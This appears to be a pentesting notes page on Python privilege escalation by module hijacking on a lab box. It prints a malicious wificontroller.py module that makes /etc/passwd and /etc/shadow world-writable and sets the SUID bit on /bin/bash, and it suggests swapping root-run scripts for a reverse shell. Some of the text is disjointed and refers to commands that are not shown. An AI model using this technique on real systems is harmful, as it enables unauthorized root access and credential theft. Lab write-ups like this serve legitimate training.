search

Python based applications escalation

If they run as root and we can write them replace them with a python reverse shell.

hashtag
Module Hijacking

This happens when the module that a script wants to use isnt imported, we can replace it with our own version.

1

sudo -l

arrow-up-right

wifi_reset.py was importing a module wificontroller and executing some commands but this wifcontroller module was absent.

arrow-up-right

So ,we created our malicious wificontroller.py module inside the same folder i.e. /home/walter which had the malicious Privilege Escalation code. And executed it.

import os
 
def stop(text,value):
        os.system("chmod 777 /etc/passwd");
 
def reset(text,value):
        os.system("chmod +s /bin/bash");
 
def start(text,value):
        os.system("chmod 777 /etc/shadow");

arrow-up-right

As a result of executing it, we got following results.

arrow-up-right

BASH is having SUID bit. So, we became root with following command and read the root flag.

See? All it does it spawn a bash shell. Now lets run our sudo command โ€œsudo /usr/bin/python /home/walter/wifi_reset.pyโ€.

We get root, proof.txt and this box is done.

PreviousTips to become rootNextInternal Services

Last updated